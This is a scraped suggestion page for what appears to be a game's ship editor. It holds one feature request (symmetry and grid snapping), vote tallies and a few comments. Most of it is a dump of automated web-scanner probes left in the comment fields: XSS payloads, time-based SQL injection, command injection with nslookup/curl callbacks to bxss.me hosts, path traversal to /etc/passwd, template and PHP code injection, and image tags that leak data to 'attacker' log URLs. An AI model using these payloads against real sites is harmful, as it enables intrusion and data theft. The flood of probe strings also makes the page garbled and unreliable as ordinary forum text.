I think you should have a symmetry mode for making ships and a snap to grid mode so that it makes ships look better if you want that like maybe hold s for symmetry and g for the grid.
710 agree
Vote8064 agree
2858 agree
798 agree
772 agree
746 agree
746 agree
710 agree
681 agree
661 agree
661 agree
645 agree
632 agree
623 agree
622 agree
602 agree
592 agree
590 agree
579 agree
579 agree
572 agree
566 agree
565 agree
564 agree
564 agree
558 agree
552 agree
522 agree
522 agree
519 agree
511 agree
506 agree
497 agree
495 agree
493 agree
490 agree
488 agree
482 agree
479 agree
476 agree
469 agree
467 agree
465 agree
462 agree
461 agree
455 agree
455 agree
441 agree
434 agree
432 agree
420 agree
Anonymous
tdetgasGandhi-Chan
Good idea.J
OppJ
OppJ
OppJ
OppJ
OppJ
OppJmanchegozapata
yess, do itJmanchegozapata
yess, do itJmanchegozapata
yess, do itJJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1bVCFLO1BbLhKcFGcO
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
${9999900+9999108}${10000357+10000390}
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
echo mwvftm$()\ wvvkpi\nz^xyu||a #' &echo mwvftm$()\ wvvkpi\nz^xyu||a #|" &echo mwvftm$()\ wvvkpi\nz^xyu||a #WfxYANoW
response.write(9665125*9162056)WfxYANoW
'+response.write(9665125*9162056)+'Anonymous
1WfxYANoW
&echo qbvtep$()\ kujupm\nz^xyu||a #' &echo qbvtep$()\ kujupm\nz^xyu||a #|" &echo qbvtep$()\ kujupm\nz^xyu||a #WfxYANoW
file:///etc/passwdWfxYANoW
"+response.write(9665125*9162056)+"WfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgresponse.write(9959785*9047579)
1WfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
http://bxss.me/t/fit.txt?.jpg'+response.write(9959785*9047579)+'
1WfxYANoW
KPeAFTHFWfxYANoW
1WfxYANoW
KrWKqjue: fsuex9ZL"+response.write(9959785*9047579)+"
1lTLQDNfG
1WfxYANoW
/etc/shellsWfxYANoW
../1WfxYANoW
1&n930314=v930316WfxYANoW
1&echo uuvspg$()\ iujcqy\nz^xyu||a #' &echo uuvspg$()\ iujcqy\nz^xyu||a #|" &echo uuvspg$()\ iujcqy\nz^xyu||a #d09kcTBWZ1U=
1WfxYANoW
)WfxYANoW
|echo sxyymm$()\ mdnnxx\nz^xyu||a #' |echo sxyymm$()\ mdnnxx\nz^xyu||a #|" |echo sxyymm$()\ mdnnxx\nz^xyu||a #WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
!(()&&!|*|*|WfxYANoW&n934534=v970967
1WfxYANoW
c:/windows/win.iniWfxYANoW
1WfxYANoW
1|echo zsbqgl$()\ efwpum\nz^xyu||a #' |echo zsbqgl$()\ efwpum\nz^xyu||a #|" |echo zsbqgl$()\ efwpum\nz^xyu||a #WfxYANoW
(nslookup -q=cname hitiobjscjkju3a138.bxss.me||curl hitiobjscjkju3a138.bxss.me))JuIOyspN: oHpznrbK
1WfxYANoW
$(nslookup -q=cname hitwxwlgiwplx486e2.bxss.me||curl hitwxwlgiwplx486e2.bxss.me)WfxYANoW
^(#$!@#$)(()))******WfxYANoW
bxss.meWfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))file:///etc/passwd
1WfxYANoW
'"()WfxYANoW
'.gethostbyname(lc('hitmk'.'wypircdk346c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(89).chr(110).chr(86).'WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
1'&&sleep(27*1000)*ozmujf&&'WfxYANoW
';print(md5(31337));$a='WfxYANoW
1WfxYANoW
xfs.bxss.meWfxYANoW
&nslookup -q=cname hitalhnmzcvaq70044.bxss.me&'\"`0&nslookup -q=cname hitalhnmzcvaq70044.bxss.me&`')
1../WfxYANoW
1WfxYANoW
&(nslookup -q=cname hitntelasuekndbc7b.bxss.me||curl hitntelasuekndbc7b.bxss.me)&'\"`0&(nslookup -q=cname hitntelasuekndbc7b.bxss.me||curl hitntelasuekndbc7b.bxss.me)&`'xfs.bxss.me
1WfxYANoW
'"1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1WfxYANoW
|(nslookup -q=cname hitttykstewgkce25a.bxss.me||curl hitttykstewgkce25a.bxss.me)WfxYANoW
".gethostbyname(lc("hityx"."esjkngyq09702.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(86).chr(115).chr(86)."Http://bxss.me/t/fit.txt
1WfxYANoW
1'"()&%<zzz><ScRiPt >VS7m(9607)</ScRiPt>WfxYANoW
";print(md5(31337));$a="WfxYANoW
<!--WfxYANoW
1"&&sleep(27*1000)*nwofko&&"WfxYANoW
'"()&%<zzz><ScRiPt >VS7m(9646)</ScRiPt>'"
1WfxYANoW
`(nslookup -q=cname hitdfoorkbwct1e22a.bxss.me||curl hitdfoorkbwct1e22a.bxss.me)`http://bxss.me/t/fit.txt?.jpg
1!(()&&!|*|*|
1WfxYANoW
gethostbyname(lc('hitba'.'wgsavxwy13813.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(65).chr(107).chr(87)^(#$!@#$)(()))******
1WfxYANoW
1'||sleep(27*1000)*syojdu||'<!--
1WfxYANoW
${@print(md5(31337))}WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(120).concat(79).concat(116).concat(90)+(require"socket" Socket.gethostbyname("hitve"+"qvcnuokp38c62.bxss.me.")[3].to_s)+"/etc/shells
1WfxYANoW
${@print(md5(31337))}\WfxYANoW
;(nslookup -q=cname hitvmfoclqcqpdea7a.bxss.me||curl hitvmfoclqcqpdea7a.bxss.me)|(nslookup -q=cname hitvmfoclqcqpdea7a.bxss.me||curl hitvmfoclqcqpdea7a.bxss.me)&(nslookup -q=cname hitvmfoclqcqpdea7a.bxss.me||curl hitvmfoclqcqpdea7a.bxss.me)WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(100).concat(84).concat(102).concat(90)+(require'socket' Socket.gethostbyname('hitek'+'adomintpa2c6a.bxss.me.')[3].to_s)+'WfxYANoW
'.print(md5(31337)).'WfxYANoW
19482746WfxYANoW
1"||sleep(27*1000)*cfwdqd||"WfxYANoW
'A'.concat(70-3).concat(22*4).concat(108).concat(79).concat(118).concat(78)+(require'socket' Socket.gethostbyname('hitck'+'zyvmlmtk1e42b.bxss.me.')[3].to_s)WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitbxcsvtutmr7c78c.bxss.me||curl${IFS}hitbxcsvtutmr7c78c.bxss.me)WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitrldxlofpgrbe0ce.bxss.me||curl${IFS}hitrldxlofpgrbe0ce.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrldxlofpgrbe0ce.bxss.me||curl${IFS}hitrldxlofpgrbe0ce.bxss.me)&`'WfxYANoW
1WfxYANoW
bfg2444<s1﹥s2ʺs3ʹhjl2444'"()
1WfxYANoW
commentWfxYANoW'&&sleep(27*1000)*dqakoj&&'
1WfxYANoW
1c:/windows/win.ini
1WfxYANoW
bxss.me/t/xss.html?%00';print(md5(31337));$a='
1WfxYANoW"&&sleep(27*1000)*sxcnng&&"
1WfxYANoW
comment�";print(md5(31337));$a="
1${@print(md5(31337))}
1WfxYANoW'||sleep(27*1000)*qprmgb||'
1${@print(md5(31337))}\
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
comment/.HttP://bxss.me/t/xss.html?%00
1bxss.me
1bxss.me/t/xss.html?%00
1'.print(md5(31337)).'
1comment
1WfxYANoW"||sleep(27*1000)*qppmfr||"
1WfxYANoW
<th:t="${dfb}#foreachcomment�
1comment/.
1WfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >VS7m(9442)</ScRiPt>WfxYANoW
1<WV8L49>XPINH[!+!]</WV8L49>WfxYANoW
1<script>VS7m(9132)</script>WfxYANoW
1<script>VS7m(9646)</script>9646WfxYANoW
1WfxYANoW
1<ScR<ScRiPt>IpT>VS7m(9626)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >VS7m(9255)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9075></ScRiPt>WfxYANoW
1<�ScRiPt >VS7m(9202)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=VS7m(9131)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9786'>WfxYANoW
1<body onload=VS7m(9593)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=VS7m(9758)>WfxYANoW
1<img src=xyz OnErRor=VS7m(9987)>WfxYANoW
1<img/src=">" onerror=alert(9692)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%56%53%37%6D%289391%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1w6lfoQZ5WfxYANoW
1\u003CScRiPt\VS7m(9031)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>VS7m(9990)</sCripT>WfxYANoW
1<input autofocus onfocus=VS7m(9911)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(VS7m(9076))}WfxYANoW
1triq6 <ScRiPt >VS7m(9474)</ScRiPt>WfxYANoW
1<WUYOCI>LLZ2D[!+!]</WUYOCI>WfxYANoW
1<ifRAme sRc=9069.com></IfRamE>WfxYANoW
1<aCn005B x=9855>WfxYANoW
1WfxYANoW
1<img sRc='http://attacker-9923/log.php?WfxYANoW
-1 OR 2+451-451-1=0+0+0+1 --WfxYANoW
1<aTr4yxC<WfxYANoW
-1 OR 2+317-317-1=0+0+0+1WfxYANoW'"()&%<zzz><ScRiPt >VS7m(9755)</ScRiPt>
1WfxYANoW
-1' OR 2+974-974-1=0+0+0+1 --'"()&%<zzz><ScRiPt >VS7m(9943)</ScRiPt>
1WfxYANoW
-1' OR 2+26-26-1=0+0+0+1 or 'mfTS81H0'='WfxYANoW9491836
1bfg6809<s1﹥s2ʺs3ʹhjl6809
1WfxYANoW
-1" OR 2+78-78-1=0+0+0+1 --<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >VS7m(9080)</ScRiPt>
1WfxYANoW<W9CWA3>NN74X[!+!]</W9CWA3>
1WfxYANoW<script>VS7m(9951)</script>
1WfxYANoW<script>VS7m(9597)</script>9597
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW<ScRiPt >VS7m(9494)</ScRiPt>
1WfxYANoW<�ScRiPt >VS7m(9664)</ScRiPt>
1WfxYANoW<body onload=VS7m(9338)>
1WfxYANoW<img src=xyz OnErRor=VS7m(9727)>
1WfxYANoW<img/src=">" onerror=alert(9777)>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'ZWfxYANoW\u003CScRiPt\VS7m(9913)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>VS7m(9823)</sCripT>
1WfxYANoW<input autofocus onfocus=VS7m(9455)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(VS7m(9873))}
1WfxYANoWJ06q8 <ScRiPt >VS7m(9667)</ScRiPt>
1WfxYANoW<WKEYO9>5HJD9[!+!]</WKEYO9>
1WfxYANoW<ifRAme sRc=9035.com></IfRamE>
1WfxYANoW<aSXAo5t x=9080>
1WfxYANoW<img sRc='http://attacker-9386/log.php?
1WfxYANoW<acvX8eU<
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1OnINDouZ'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 658=(SELECT 658 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 89=(SELECT 89 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 407=(SELECT 407 FROM PG_SLEEP(15))--WfxYANoW
1bbaHQeFx' OR 443=(SELECT 443 FROM PG_SLEEP(15))--WfxYANoW
1o7hz26zk') OR 606=(SELECT 606 FROM PG_SLEEP(15))--WfxYANoW
10QCJ5bAs')) OR 946=(SELECT 946 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@9E1uqWfxYANoW
1WfxYANoW
1WfxYANoWH5pHg9Qh
1WfxYANoW
1-1 OR 2+719-719-1=0+0+0+1 --
1-1 OR 2+517-517-1=0+0+0+1
1-1' OR 2+595-595-1=0+0+0+1 --
1-1' OR 2+690-690-1=0+0+0+1 or '5kyMTcTc'='
1-1" OR 2+366-366-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWQp3caxNl'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@OetTs
1Peter Winter
555-555-0199@example.comPecedec150
555-555-0199@example.comlfmlpnih
1yslqkvkj
response.write(9126704*9368306)pahdxtvu
1lrxersyu
set|set&setyslqkvkj
'+response.write(9126704*9368306)+'pahdxtvu
1lrxersyu
$(nslookup De1Z8npv)yslqkvkj
"+response.write(9126704*9368306)+"pahdxtvu
0C4TXenflrxersyu
&nslookup 2a3W4Fi9&'\"`0&nslookup 2a3W4Fi9&`'response.write(9496776*9827119)
1pahdxtvu
-1 OR 2+802-802-1=0+0+0+1 --set|set&set
1'+response.write(9496776*9827119)+'
1pahdxtvu
-1 OR 2+464-464-1=0+0+0+1$(nslookup D7KaexPd)
1"+response.write(9496776*9827119)+"
1pahdxtvu
-1' OR 2+498-498-1=0+0+0+1 --&nslookup Aeec8wiE&'\"`0&nslookup Aeec8wiE&`'
1fgmdidtn
HjyX5dn1pahdxtvu
-1' OR 2+23-23-1=0+0+0+1 or 'R4eS2IV5'='qjbivkwc
../../../../../../../../../../etc/passwdKki5FhPI
1pahdxtvu
-1" OR 2+56-56-1=0+0+0+1 --qjbivkwc
../../../../../../../../../../../../../../../proc/versionfglsavua
1pahdxtvu
if(now()=sysdate(),sleep(22),0)/*'XOR(if(now()=sysdate(),sleep(22),0))OR'"XOR(if(now()=sysdate(),sleep(22),0))OR"*/qjbivkwc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpghmwiofmj
${9999870+9999575}pahdxtvu
(select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/qjbivkwc
../../../../../../../../../../etc/passwd�.jpg${9999988+9999453}
1pahdxtvu
-1; waitfor delay '0:0:7' --qjbivkwc
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgcyoxbytf
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgOEczSjllTHk=
1pahdxtvu
-1); waitfor delay '0:0:7' --qjbivkwc
/../..//../..//../..//../..//../..//etc/passwd�.jpgcyoxbytf
1some_inexistent_file_with_long_name�.jpgwyxxepgf
1&n959608=v997184fglsavua
1pahdxtvu
1 waitfor delay '0:0:15' --qjbivkwc
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdcyoxbytf
Http://testasp.vulnweb.com/t/fit.txtAnonymous
1pahdxtvu
ojT41Lie'; waitfor delay '0:0:15' --qjbivkwc
/etc/passwdcyoxbytf
http://testasp.vulnweb.com/t/fit.txt?.jpgiadrjfel&n981415=v939994
1pahdxtvu
-1;select pg_sleep(15); --qjbivkwc
%2fetc%2fpasswdcyoxbytf
testasp.vulnweb.compahdxtvu
-1);select pg_sleep(22); --qjbivkwc
/.././.././.././.././.././.././.././../etc/./passwd%00jafqixnc
)pahdxtvu
-1));select pg_sleep(22); --qjbivkwc
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdcglmwkmn
;print(md5(acunetix_wvs_security_test));1some_inexistent_file_with_long_name�.jpg
1jafqixnc
!(()&&!|*|*|rqpfbgef
'"()pahdxtvu
hnBCAeEx';select pg_sleep(22); --qjbivkwc
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdcglmwkmn
';print(md5(acunetix_wvs_security_test));$a='Http://testasp.vulnweb.com/t/fit.txt
1jafqixnc
^(#$!@#$)(()))******pahdxtvu
mFdt32el');select pg_sleep(22); --cglmwkmn
";print(md5(acunetix_wvs_security_test));$a="http://testasp.vulnweb.com/t/fit.txt?.jpg
1)
1'"()
1pahdxtvu
pTHlg1hM'));select pg_sleep(22); --qjbivkwc
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.cglmwkmn
${@print(md5(acunetix_wvs_security_test))}testasp.vulnweb.com
1!(()&&!|*|*|
1euhaahfw
http://testasp.vulnweb.com/t/xss.html?%00.jpgpahdxtvu
1qjbivkwc
file:///etc/passwdcglmwkmn
${@print(md5(acunetix_wvs_security_test))}\wgmemjgf
1^(#$!@#$)(()))******
1rdhddhfa
http://hithY7YduKmuO.bxss.me/http://testasp.vulnweb.com/t/xss.html?%00.jpg
1pahdxtvu
1qjbivkwc
/\../\../\../\../\../\../\../etc/passwd;print(md5(acunetix_wvs_security_test));
1wgmemjgf
commentelcniwbp
1http://hitdJyzPEDL9g.bxss.me/
1tdabwxyc
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))LTxOdpSI
1qjbivkwc
WEB-INF/web.xml';print(md5(acunetix_wvs_security_test));$a='
1wgmemjgf
comment�elcniwbp
1'"gdjffyun
/www.vulnweb.com-1 OR 2+779-779-1=0+0+0+1 --
1qjbivkwc
/WEB-INF/web.xml";print(md5(acunetix_wvs_security_test));$a="
1wgmemjgf
comment/.elcniwbp
\/www.vulnweb.com
1psinprqr
'"-1 OR 2+286-286-1=0+0+0+1
1qjbivkwc
WEB-INF\web.xml${@print(md5(acunetix_wvs_security_test))}
1wgmemjgf
1sxgfhynh
1'"()&%<acx><ScRiPt >CtgT(9439)</ScRiPt>psinprqr
<!---1' OR 2+873-873-1=0+0+0+1 --
1../../../../../../../../../../etc/passwd
1${@print(md5(acunetix_wvs_security_test))}\
1comment
1elcniwbp
@@S17RK'"
1-1' OR 2+396-396-1=0+0+0+1 or 'vYdDqI4b'='
1comment�
1elcniwbp
JyI=sxgfhynh
'"()&%<acx><ScRiPt >CtgT(9358)</ScRiPt><!--
1-1" OR 2+946-946-1=0+0+0+1 --
1comment/.
1../../../../../../../../../../etc/passwd�.jpg
1sxgfhynh
1_9960elcniwbp
(select convert(int,CHAR(65)))1 waitfor delay '0:0:8' --
1elcniwbp
1sxgfhynh
acu3004<s1﹥s2ʺs3ʹuca3004TzoiqUtC'; waitfor delay '0:0:8' --
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
11'"
1nLTdUPeI';select pg_sleep(8); --
1/etc/passwd
1\
10VXNs81Z');select pg_sleep(8); --
1%2fetc%2fpasswd
1RsPCZC9b'));select pg_sleep(17); --
1@@KUTb0
1sxgfhynh
{{10000044*10000473}}JyI=
1sxgfhynh
1<ScRiPt >CtgT(9813)</ScRiPt>(select convert(int,CHAR(65)))
1sxgfhynh
1<WDSTJB>F6VFM[!+!]</WDSTJB>file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1sxgfhynh
1<script>CtgT(9048)</script>WEB-INF/web.xml
1/WEB-INF/web.xml
1sxgfhynh
1<ScR<ScRiPt>IpT>CtgT(9136)</sCr<ScRiPt>IpT>WEB-INF\web.xml
1sxgfhynh
1<ScRiPt >CtgT(9553)</ScRiPt>sxgfhynh
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9259></ScRiPt>sxgfhynh
1<�ScRiPt >CtgT(9816)</ScRiPt>sxgfhynh
1<video><source onerror="javascript:CtgT(9874)">sxgfhynh
1<isindex type=image src=1 onerror=CtgT(9363)>sxgfhynh
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9011'>sxgfhynh
1<body onload=CtgT(9924)>sxgfhynh
1<img src=//testasp.vulnweb.com/t/dot.gif onload=CtgT(9879)>sxgfhynh
1<img src=xyz OnErRor=CtgT(9076)>sxgfhynh
1<img/src=">" onerror=alert(9135)>sxgfhynh
%31%3C%53%63%52%69%50%74%20%3E%43%74%67%54%289819%29%3C%2F%73%43%72%69%70%54%3Esxgfhynh
1\u003CScRiPt\CtgT(9911)\u003C/sCripT\u003Esxgfhynh
1<ScRiPt>CtgT(9805)</sCripT>sxgfhynh
1<input autofocus onfocus=CtgT(9763)>sxgfhynh
<a HrEF=http://www.vulnweb.com></a>sxgfhynh
<a HrEF=jaVaScRiPT:>sxgfhynh
[url=http://www.vulnweb.com][/url]sxgfhynh
1<img<!-- --> src=x onerror=alert(9249);//><!-- -->sxgfhynh
1}body{acu:Expre/**/SSion(CtgT(9730))}sxgfhynh
1<% contenteditable onresize=CtgT(9980)>sxgfhynh
1_vxvZz <ScRiPt >CtgT(9506)</ScRiPt>sxgfhynh
1<WHR3SP>RR7Z5[!+!]</WHR3SP>sxgfhynh
1<ifRAme sRc=9142.com></IfRamE>sxgfhynh
1<KUHz9T x=9926>sxgfhynh
1<img sRc='http://attacker-9336/log.php?sxgfhynh'"()&%<acx><ScRiPt >CtgT(9493)</ScRiPt>
1'"()&%<acx><ScRiPt >CtgT(9172)</ScRiPt>
1sxgfhynh_9574
1acu2506<s1﹥s2ʺs3ʹuca2506
1{{9999260*9999889}}
1sxgfhynh<ScRiPt >CtgT(9935)</ScRiPt>
1sxgfhynh<W42AXS>SSRIP[!+!]</W42AXS>
1sxgfhynh<script>CtgT(9431)</script>
1sxgfhynh<ScRiPt >CtgT(9787)</ScRiPt>
1sxgfhynh<�ScRiPt >CtgT(9859)</ScRiPt>
1sxgfhynh<body onload=CtgT(9265)>
1sxgfhynh<img src=xyz OnErRor=CtgT(9647)>
1sxgfhynh<img/src=">" onerror=alert(9563)>
1sxgfhynh\u003CScRiPt\CtgT(9198)\u003C/sCripT\u003E
1sxgfhynh<ScRiPt>CtgT(9866)</sCripT>
1sxgfhynh<input autofocus onfocus=CtgT(9824)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1sxgfhynh}body{acu:Expre/**/SSion(CtgT(9315))}
1sxgfhynh<% contenteditable onresize=CtgT(9994)>
1sxgfhynh_Q3CPh <ScRiPt >CtgT(9408)</ScRiPt>
1sxgfhynh<W4YZPH>P9NO2[!+!]</W4YZPH>
1sxgfhynh<ifRAme sRc=9285.com></IfRamE>
1sxgfhynh<5hvbhS x=9140>
1sxgfhynh<img sRc='http://attacker-9932/log.php?
1Comment